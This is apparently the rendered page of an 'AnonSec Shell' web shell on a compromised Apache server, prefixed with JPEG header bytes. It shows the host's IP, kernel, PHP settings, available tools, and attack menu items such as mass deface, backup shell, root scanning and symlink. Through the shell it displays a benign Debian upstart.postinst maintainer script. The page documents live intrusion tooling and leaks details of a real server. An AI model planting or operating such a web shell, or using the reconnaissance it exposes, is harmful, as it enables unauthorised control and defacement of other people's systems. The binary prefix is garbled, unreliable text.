JFIF  H H C nxxd C "     &    !1A2Q"aqBb    1   ? R{~ ,.Y| @sl_޸s[+6ϵG};?2Y`&9LP ?3rj  "@V]:3T -G*P ( *(@AEY]qqqALn +Wtu?)l QU T* Aj- x:˸T u53Vh @PS@ ,i,!"\hPw+E@ ηnu ڶh% (Lvũbb- ?M֍݌٥IHln㏷L(6 9L^"6P  d&1H&8@TUT CJ%eʹFTj4i5=0g J &Wc+3kU@PS@HH33M * "Uc(\`F+b{RxWGk ^#Uj*v' V ,FYKɠMckZٸ]ePP  d\A2glo=WL(6 ^;k"ucoH"b ,PDVlvL_/:̗rN\m dcw T-O$w+FZ5T *Y~l: 99U)8ZAt@GLX*@bijqW;MᎹ،O[5*5*@=qusݝ *EPx՝.~ YИ 3M3@E)GTg%Anp P MUҀhԳW c֦iZ ffR 7qMcyAZT c0bZU k+oG<] APQ T A={PDti@c>>KÚ"q L.1P k6QY7t.k7o  <P &yַܼJZy Wz{UrS @ ~P)Y:A"]Y&ScVO%17 6l4 i4YR5 ruk* ؼdZͨZZ cLakb3N6æ\1`XTloTuT AA 7Uq@2ŬzoʼnБRͪ&8}: e}0ZNΖJ*Ս9˪ޘtao]7$ 9EjS} qt" ( .=Y:V#'H: δ4#6yjѥBB ;WD-ElFf67*\AmAD Q __'2$ TX 9nu'm@iPDT qS`%u%3[nY,  :g = tiX H]ij"+6Z* .~|05s6 ,ǡ ogm+ KtE-BF  ES@(UJ xM~8%g/= Vw[Vh 3lJT  rK -kˎY ٰ  ,ukͱٵf sXDP  ]p]&MS95O+j &f6m463@ t8ЕX=6}HR 5ٶ06 /@嚵*6  " hP@eVDiYQT `7tLf4c?m//B4 laj  L} :E  b#PHQb, yN`rkAb^ |} s4XB4 * ,@[{Ru+%le2} `,kI$U` >OMuh  P % ʵ/ L\5aɕVN1R6 3}ZLj-Dl@ *( K\^i@F@551 k㫖h  Q沬#h XV +;]6z OsFpiX $OQ ) ųl4 YtK'(W AnonSec Shell
AnonSec Shell
Server IP : 20.75.53.88  /  Your IP : 216.73.217.165   [ Reverse IP ]
Web Server : Apache
System : Linux VMRALP-3 4.4.0-256-generic #290~14.04.1-Ubuntu SMP Thu Jun 20 09:24:50 UTC 2024 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29+esm15
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
Domains : 3 Domains
MySQL : ON  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/lib/dpkg/info/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/lib/dpkg/info/upstart.postinst
#!/bin/sh -e

if dpkg --compare-versions "$2" lt-nl 0.6.0; then
	# We're upgrading from a version of Upstart that doesn't use
	# D-Bus for its IPC.  We have to tell it to re-exec into one
	# that does.  It'll lose all state, but we didn't keep much
	# in those days.
	telinit u
elif ! ischroot; then
	# Do not honour re-exec when requested from within a
	# chroot since:
	#
	# (a) The version of Upstart outside might not support it.
	# (b) An isolated environment such as a chroot should
	#     not be able to modify its containing environment.
	#
	# A sufficiently new Upstart will actually handle a re-exec
	# request coming from telinit within a chroot correctly,
	# but it's simple enough to perform the check here and save
	# Upstart the effort.

	# Query running version of Upstart, but only when we know
	# that initctl will work.
	#
	# The calculated version string may be the null string if
	# Upstart is not running (where for example an alternative
	# init is running outside a chroot environment) or if the
	# query failed for some reason. However, the version check
	# below handles a null version string correctly.
	UPSTART_VERSION_RUNNING=$(initctl version 2>/dev/null |\
		awk '{print $3}'|tr -d ')' || :)
	
	if dpkg --compare-versions "$UPSTART_VERSION_RUNNING" ge 1.9 || [ "$UPSTART_VERSION_RUNNING" = 1.8-ubuntu-full-serialization ]; then
		# We are not running inside a chroot and the running version
		# of Upstart supports lossless stateful re-exec, so we can
		# restart immediately.
		#
		# XXX: Note that the check on the running version must
		# remain *indefinitely* since it's the only safe way to
		# know if stateful re-exec is supported: simply checking
		# packaged version numbers is not sufficient since
		# the package could be upgraded multiple times without a
		# reboot.
		telinit u || :
	elif [ "$UPSTART_JOB" = "cloud-config" ]; then
		# If upgraded by cloud-init, do not perform partial
		# stateful re-exec, as cloud-init instance will fail
		# to initialise.
		touch /var/run/init.upgraded || :
		[ -x /usr/share/update-notifier/notify-reboot-required ] && \
		    /usr/share/update-notifier/notify-reboot-required || true

	elif dpkg --compare-versions "$UPSTART_VERSION_RUNNING" ge 1.6.1; then
		# Otherwise, perform partial stateful re-exec and
		# request a reboot.
		telinit u || :
		[ -x /usr/share/update-notifier/notify-reboot-required ] && \
		    /usr/share/update-notifier/notify-reboot-required || true			    
	else
		# Before we shutdown or reboot, we need to re-exec so that we
		# can safely remount the root filesystem; we can't just do that
		# here because we lose state.
		touch /var/run/init.upgraded || :
	fi
fi

# Automatically added by dh_installdeb
dpkg-maintscript-helper rm_conffile /etc/init/dbus-reconnect.conf 0.6.3-7 -- "$@"
# End automatically added section
# Automatically added by dh_installdeb
dpkg-maintscript-helper rm_conffile /etc/init/upstart-dbus-bridge.conf 1.9.1-0ubuntu4 -- "$@"
# End automatically added section


Anon7 - 2022
AnonSec Team